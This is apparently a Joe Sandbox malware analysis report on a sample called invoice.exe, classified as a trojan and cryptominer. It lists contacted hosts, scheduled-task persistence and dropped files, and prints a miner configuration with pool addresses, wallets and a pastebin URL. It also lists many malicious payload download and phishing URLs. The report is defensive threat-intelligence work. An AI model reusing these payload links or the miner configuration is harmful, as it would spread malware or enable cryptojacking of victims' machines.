                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Entity/Id18ResponseRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Entity/Id12LRRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/XRegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Entity/Id3ResponseRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/primer-ff8ec1db4f06.cssAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/vendors-node_modules_github_hotkey_dist_index_js-node_modulesAppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://resources.github.comAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceRegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/soap/actor/nextRegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-55a9038bAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_jAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Entity/Id20LRRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-85AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/customer-storiesAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/readmeAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      172.67.19.24
                      		pastebin.comUnited States
                      		13335CLOUDFLARENETUStrue
                      140.82.121.3
                      		github.comUnited States
                      		36459GITHUBUSfalse
                      135.181.7.171
                      		unknownGermany
                      		24940HETZNER-ASDEtrue

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1504580
                      Start date and time:2024-09-05 01:44:42 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 4m 48s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:31
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:invoice.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.mine.winEXE@38/23@2/3
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 52.168.117.173, 20.189.173.20
                      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: invoice.exe

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      00:45:43Task SchedulerRun new task: dllhost path: C:\ProgramData\Dllhost\dllhost.exe
                      00:45:43Task SchedulerRun new task: NvStrayService_bk9049 path: C:\ProgramData\Dllhost\dllhost.exe
                      19:45:31API Interceptor1x Sleep call for process: invoice.exe modified
                      19:45:39API Interceptor20x Sleep call for process: powershell.exe modified
                      19:45:42API Interceptor16x Sleep call for process: AppLaunch.exe modified
                      19:45:48API Interceptor2x Sleep call for process: WerFault.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      172.67.19.24sostener.vbsGet hashmaliciousRemcosBrowse
                      • pastebin.com/raw/V9y5Q5vv
                      Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                      • pastebin.com/raw/NsQ5qTHr
                      Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                      • pastebin.com/raw/NsQ5qTHr
                      Dadebehring PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                      • pastebin.com/raw/NsQ5qTHr
                      PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                      • pastebin.com/raw/NsQ5qTHr
                      140.82.121.36glRBXzk6i.exeGet hashmaliciousRedLineBrowse
                      • github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
                      firefox.lnkGet hashmaliciousCobaltStrikeBrowse
                      • github.com/john-xor/temp/blob/main/index.html?raw=true
                      0XzeMRyE1e.exeGet hashmaliciousAmadey, VidarBrowse
                      • github.com/neiqops/ajajaj/raw/main/file_22613.exe
                      MzRn1YNrbz.exeGet hashmaliciousVidarBrowse
                      • github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
                      RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                      • github.com/ssbb36/stv/raw/main/5.mp3
                      135.181.7.171file.exeGet hashmaliciousMinerDownloader, RedLine, Vidar, XmrigBrowse
                        file.exeGet hashmaliciousMinerDownloader, RedLine, XmrigBrowse
                          file.exeGet hashmaliciousMinerDownloader, RedLine, XmrigBrowse
                            file.exeGet hashmaliciousMinerDownloader, RedLine, XmrigBrowse
                              7aqYJ5Mnxz.exeGet hashmaliciousMinerDownloader, RedLine, XmrigBrowse

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                pastebin.comFRENCH GROUP.jsGet hashmaliciousRemcosBrowse
                                • 172.67.19.24
                                _PDF__838754.msiGet hashmaliciousMetamorfoBrowse
                                • 104.20.3.235
                                CDf7AZWbMo.exeGet hashmaliciousDCRatBrowse
                                • 104.20.3.235
                                French Group.jsGet hashmaliciousRemcosBrowse
                                • 104.20.4.235
                                file.exeGet hashmaliciousRHADAMANTHYS, XWormBrowse
                                • 104.20.4.235
                                French Group.jsGet hashmaliciousRemcosBrowse
                                • 104.20.4.235
                                SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                • 172.67.19.24
                                SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                • 104.20.3.235
                                French Group.jsGet hashmaliciousRemcosBrowse
                                • 104.20.3.235
                                Mi_Documento.jsGet hashmaliciousAsyncRAT, DcRatBrowse
                                • 104.20.3.235
                                github.comhttps://d17vgkthg9sa6w.cloudfront.net/#Y8~zYXBvdGhAaGFycmlzd2lsbGlhbXMuY29tGet hashmaliciousHTMLPhisherBrowse
                                • 140.82.121.3
                                Electronic_Receipt_ATT0001.htmGet hashmaliciousHTMLPhisherBrowse
                                • 140.82.121.4
                                bad_site.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 140.82.114.4
                                https://lookerstudio.google.com/reporting/b3139b32-ff5a-40a9-b2b6-1f7e76569da2Get hashmaliciousHTMLPhisherBrowse
                                • 140.82.121.3
                                https://github.com/Azure/review-checklists/releases/latest/download/review_checklist.xlsmGet hashmaliciousUnknownBrowse
                                • 140.82.121.5
                                xde1wui2zjw.exeGet hashmaliciousAsyncRAT, PureLog Stealer, XWormBrowse
                                • 140.82.121.4
                                malicious.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 140.82.121.4

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                HETZNER-ASDESecuriteInfo.com.Script.SNH-gen.5224.29912.exeGet hashmaliciousFormBookBrowse
                                • 178.63.50.103
                                bot_library.exeGet hashmaliciousUnknownBrowse
                                • 159.69.63.226
                                bot_library.exeGet hashmaliciousUnknownBrowse
                                • 159.69.63.226
                                https://www.zdescargas.org/adobe-acrobat-pro-dc-2022-full-v15-12-2023/Get hashmaliciousHTMLPhisherBrowse
                                • 49.12.202.237
                                https://3005380968002841328691457.triart-services.com/Hjdshdihsd/shdiboidow/sosuodb/owbowehe/jdbiubfiu/pwdfibfd/oJSHmU/a3l1ZW5AY3ZjLmNvbQ==Get hashmaliciousUnknownBrowse
                                • 176.9.23.121
                                1sdc8Z0Wj1.exeGet hashmaliciousGuLoaderBrowse
                                • 148.251.143.76
                                https://notes.cozytravelers.comGet hashmaliciousUnknownBrowse
                                • 167.233.13.125
                                bot_library.exeGet hashmaliciousUnknownBrowse
                                • 159.69.63.226
                                bot_library.exeGet hashmaliciousUnknownBrowse
                                • 159.69.63.226
                                file.exeGet hashmaliciousLummaC, Amadey, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                • 176.9.8.206
                                CLOUDFLARENETUShttps://email.dependent.best/maintenance.html?book=py.kim@hdel.co.krGet hashmaliciousUnknownBrowse
                                • 172.67.180.140
                                https://www.pelisplus3.design/srdgvbbeGet hashmaliciousHTMLPhisherBrowse
                                • 188.114.96.3
                                https://docsend.com/view/s/g9wy7hdqt2mwawpcGet hashmaliciousUnknownBrowse
                                • 172.66.0.227
                                file.exeGet hashmaliciousUnknownBrowse
                                • 172.64.41.3
                                RedEngine.exeGet hashmaliciousBabadeda, RedLineBrowse
                                • 104.26.12.205
                                RANGLANDLAW.xlsxGet hashmaliciousUnknownBrowse
                                • 172.64.150.63
                                nkVQ.exeGet hashmaliciousAgentTeslaBrowse
                                • 172.67.74.152
                                http://warinice.ac.th/h/d/Get hashmaliciousUnknownBrowse
                                • 104.17.25.14
                                http://warinice.ac.th/h/d/paiement.phpGet hashmaliciousUnknownBrowse
                                • 104.17.25.14
                                http://mentmaskloegionn.gitbook.io/us/Get hashmaliciousUnknownBrowse
                                • 172.64.147.209
                                GITHUBUShttps://d17vgkthg9sa6w.cloudfront.net/#Y8~zYXBvdGhAaGFycmlzd2lsbGlhbXMuY29tGet hashmaliciousHTMLPhisherBrowse
                                • 140.82.121.3
                                http://staticfile.orgGet hashmaliciousUnknownBrowse
                                • 140.82.114.22
                                Electronic_Receipt_ATT0001.htmGet hashmaliciousHTMLPhisherBrowse
                                • 140.82.121.4
                                bad_site.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 140.82.114.4
                                https://lookerstudio.google.com/reporting/b3139b32-ff5a-40a9-b2b6-1f7e76569da2Get hashmaliciousHTMLPhisherBrowse
                                • 140.82.121.3
                                https://github.com/Azure/review-checklists/releases/latest/download/review_checklist.xlsmGet hashmaliciousUnknownBrowse
                                • 140.82.121.5
                                xde1wui2zjw.exeGet hashmaliciousAsyncRAT, PureLog Stealer, XWormBrowse
                                • 140.82.121.4
                                https://smruti-ranjan-sahoo-tech.github.io/NetflixCloneGet hashmaliciousHTMLPhisherBrowse
                                • 140.82.112.17
                                malicious.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 140.82.121.4
                                https://demo.testfire.net/login.jspGet hashmaliciousUnknownBrowse
                                • 140.82.121.5

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                3b5074b1b5d032e5620f69f9f700ff0eRedEngine.exeGet hashmaliciousBabadeda, RedLineBrowse
                                • 172.67.19.24
                                • 140.82.121.3
                                nkVQ.exeGet hashmaliciousAgentTeslaBrowse
                                • 172.67.19.24
                                • 140.82.121.3
                                http://warinice.ac.th/h/d/paiement.phpGet hashmaliciousUnknownBrowse
                                • 172.67.19.24
                                • 140.82.121.3
                                XClient.exeGet hashmaliciousXWormBrowse
                                • 172.67.19.24
                                • 140.82.121.3
                                http://pub-ca22a10ffb7349aca30da700c49a0d87.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                • 172.67.19.24
                                • 140.82.121.3
                                https://ecom.bio/88bmwbm?gad_source=1&gclid=Cj0KCQjwiuC2BhDSARIsALOVfBJ293HpuZvtJvhD8kPzmEW6CdE9kLYMBSVdTvNfgfsL__VlxT7t4s4aAiVuEALw_wcBGet hashmaliciousUnknownBrowse
                                • 172.67.19.24
                                • 140.82.121.3
                                http://pub-719c8fa48daf46c3b7652581c04f08c2.r2.dev/zzzzzzzzzzz01.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 172.67.19.24
                                • 140.82.121.3
                                https://folgot-login.click/icloud2022-esp.php/isignesp.php/isignesp.php/Get hashmaliciousUnknownBrowse
                                • 172.67.19.24
                                • 140.82.121.3
                                http://www.rb.gy/1vahpx/Get hashmaliciousUnknownBrowse
                                • 172.67.19.24
                                • 140.82.121.3
                                https://claim-hadiah.3841.my.id/Get hashmaliciousUnknownBrowse
                                • 172.67.19.24
                                • 140.82.121.3

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\ProgramData\HostData\logs.uce

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):345
                                Entropy (8bit):5.7081731137089875
                                Encrypted:false
                                SSDEEP:6:DiYgE/ovRhBFqGTUhKliYgE/ovRhBFqGTUhKSI7wKd/cwEJPDdVsYQnKfaHTPOxR:uwgphTlMxwgphTlMA7cwo7LS9jqgq2Ah
                                MD5:0A686F03494576F1204E65653BCE54BF
                                SHA1:22FAA860EC67A432ED3B6829939B5F6353139BC4
                                SHA-256:E93E709DA2BF600012DF6FA6BEE9775C42C337501C485757F3A7BCA17C135D7D
                                SHA-512:EEA7C9A97657EF872D777504C1A5981437493C940B745EFAAE8D521877862398EDFB4FFD49D79D434AF5D12F2433DA605EA2959858CC1858B40098C768E66253
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\ProgramData\HostData\logs.uce, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\ProgramData\HostData\logs.uce, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\ProgramData\HostData\logs.uce, Author: Joe Security
                                Preview:ETCHASH..etc.2miners.com:1010..0x3CDd8bD2585d5ad6C952De241E0E91D4C85d3Fe4..ETCHASH..etc.2miners.com:1010..0x3CDd8bD2585d5ad6C952De241E0E91D4C85d3Fe4..XMR..xmr-eu1.nanopool.org:14433..4ABgk8FGE9UaEq9uhKpc9sMMfHouAgzvXeLJy8MmydhZMM8bWoTDuDWGj5bboFKWMzTcTfhaVhQ1zLbvrKUR9kjvA69WX8K..S1lent_Hash..S1lent_Hash..cp..https://pastebin.com/raw/PTNbBX9V..

                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_4usfliof.exe_12acea454c1da7fbcd72805cea394fe399172680_387adc58_f6ecaf97-1fdd-4c93-8466-2db9d9ef8072\Report.wer

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.7274206994445057
                                Encrypted:false
                                SSDEEP:96:kUFpT5US7sNhWoI7RT6tQXIDcQvc6QcEVcw3cE/FHsHE+HbHg/8BRTf3Oy1H3a9Q:lDD7d0BU/5UNjuGzuiF0+Z24IO8yzv
                                MD5:77C929C30939E3D7DDB8B4AC22D277E0
                                SHA1:7E6EF327384B0903B0E3DD5F272137393CCC09C5
                                SHA-256:80D81A84E7E4A6896157DC6E2A4A72C781A9291D3F1360159224F9253B3D396A
                                SHA-512:2BC57A8E06E4943F08C03D5A77BA06E9D31FDCEEA887A00EF8F0DED0BAA7244D786C9B38E727244AF04E4580B6BA8FE06DDC052A29AD058D6AE009A4156AE2B4
                                Malicious:false
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.9.6.7.1.3.3.3.2.5.4.9.8.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.9.6.7.1.3.3.9.3.4.8.7.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.6.e.c.a.f.9.7.-.1.f.d.d.-.4.c.9.3.-.8.4.6.6.-.2.d.b.9.d.9.e.f.8.0.7.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.3.f.3.f.1.5.b.-.3.d.4.9.-.4.6.b.9.-.8.7.1.4.-.4.3.5.1.7.c.2.3.1.7.4.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.4.u.s.f.l.i.o.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.a.8.-.0.0.0.1.-.0.0.1.4.-.2.3.c.8.-.2.2.8.7.2.4.f.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.e.c.b.2.8.8.9.5.c.2.1.6.7.0.9.a.3.1.3.9.a.d.a.8.e.7.4.0.e.5.0.0.0.0.0.f.f.f.f.!.0.0.0.0.a.d.e.0.7.2.f.e.a.7.3.e.4.f.7.6.c.0.7.3.e.1.7.b.b.7.5.d.c.2.d.1.3.b.2.7.5.9.1.9.!.4.u.s.f.l.i.o.f...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3./.

                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yee9mbi69cm7.exe_48ca6ddca1152b88938c7c937c222df383051a_b588fa24_b755bcbb-81db-4dc2-9706-9ef5b4df1c83\Report.wer

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.7327043040042487
                                Encrypted:false
                                SSDEEP:192:2pIPABY0BU/5M1juGzuiF0+Z24IO86rJ:LABzBU/AjfzuiF0+Y4IO8Y
                                MD5:00F8BED9213F2DFF853F6C5CFCA60E23
                                SHA1:C96DBB062AE49EF27120B2F993452CF51FF8354E
                                SHA-256:F540741F4FA8F57CC8FA2B90CA5E8AB5F401DF43EFC7B877A770BA0A2122F57F
                                SHA-512:5FF657D5DE61370ABB84D28340BF21E1A6E31A9BE3448F5970AE5D482A1CEB249534251FBFC6451C52E67BDD83959BFE8AE4C6C865FE4EAABF4AA7A6740CBFE3
                                Malicious:false
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.9.6.7.1.3.5.8.2.7.5.5.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.9.6.7.1.3.6.6.7.1.3.0.9.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.7.5.5.b.c.b.b.-.8.1.d.b.-.4.d.c.2.-.9.7.0.6.-.9.e.f.5.b.4.d.f.1.c.8.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.c.0.5.1.0.5.e.-.6.0.a.d.-.4.9.7.1.-.9.0.1.4.-.a.a.5.5.7.a.a.b.4.1.0.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.e.e.9.m.b.i.6.9.c.m.7...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.7.0.-.0.0.0.1.-.0.0.1.4.-.0.9.8.e.-.2.8.8.7.2.4.f.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.1.b.0.3.4.f.1.3.5.3.1.f.2.8.d.4.9.e.3.4.6.c.0.a.c.1.8.4.7.1.5.0.0.0.0.f.f.f.f.!.0.0.0.0.4.d.f.9.e.d.4.5.2.4.4.7.4.c.5.1.0.8.4.5.3.4.5.3.d.c.f.e.8.3.7.a.a.1.4.8.b.7.6.1.!.y.e.e.9.m.b.i.6.9.c.m.7...e.x.e.....T.a.r.g.e.t.A.p.p.V.

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D22.tmp.dmp

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Wed Sep 4 23:45:33 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):43110
                                Entropy (8bit):1.6992816708496177
                                Encrypted:false
                                SSDEEP:192:GDbJcS3630xbOU5F1JVJ3+uMpvnwaDEiUHPH5IFH:UuSriU5LJT+V94iQHm
                                MD5:03D5EFA2327F0FEB4EE7C30FB354FE93
                                SHA1:C29D0B87674FA9868BB8E9DEEB888D15ACA3E398
                                SHA-256:638B33E8AAB8CF615F29E712EC76EFF4EBC81E89B57520C1917F0A852EAD6ABB
                                SHA-512:572437295B6A08E04394E164266C6EFA8ABE444EB3444C80E31BC69D753AD7730E56F14500B20B79E1E1064712C6F24593B20C3D6F12FBADECA56E74DA7F19F0
                                Malicious:false
                                Preview:MDMP..a..... ..........f........................0...........4...n!..........T.......8...........T...........@...&.......................................................................................................eJ..............GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER5DA0.tmp.WERInternalMetadata.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):6374
                                Entropy (8bit):3.7195141075979734
                                Encrypted:false
                                SSDEEP:96:RSIU6o7wVetbKI6rcYYrPlQE/ZJY5aM4U/89bDFsfKBm:R6l7wVeJKI6IYYxopr/89bDFsfKBm
                                MD5:501E63C84797D7440D80FCF820A6974B
                                SHA1:2D03E24AEC21DB45E423897921AA1F7AD39BF8A1
                                SHA-256:8206179F2B7B5BF61BA77B7BB6C5D1BE2B4CFBEEC8CF3FB636601997E7EA99A1
                                SHA-512:51F88B1EBA3CE5B6853586957809534E63828FB84FEBD5D599F2A4FC5796E5D2FFE718939CEE4A07EFEF860F824D4CDD53D3B05494ADD3E9EBAB3365091BE030
                                Malicious:false
